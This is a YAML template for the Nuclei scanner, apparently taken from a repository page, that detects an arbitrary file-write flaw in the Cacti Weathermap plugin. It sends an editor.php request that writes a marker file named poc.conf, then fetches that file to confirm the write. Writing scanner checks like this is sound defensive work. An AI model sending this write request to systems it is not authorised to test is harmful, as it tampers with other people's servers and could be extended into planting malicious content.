31 lines
1.3 KiB
YAML
31 lines
1.3 KiB
YAML
id: cacti-weathermap-file-write
|
|
|
|
info:
|
|
name: Cacti Weathermap File Write
|
|
author: pikpikcu
|
|
severity: medium
|
|
description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
|
|
metadata:
|
|
max-request: 2
|
|
tags: injection,cacti
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"
|
|
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/plugins/weathermap/configs/poc.conf"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
|
|
part: body
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100e007bc546210a550061742fec465f5462c91d52c6e1bd59d4310a1fa9e5dbb3502202a97985ab447760c5a4ffb20ae2de531e0f9576a0c38c6b65fcc6ffbdde931f8:922c64590222798bb761d5b6d8e72950 |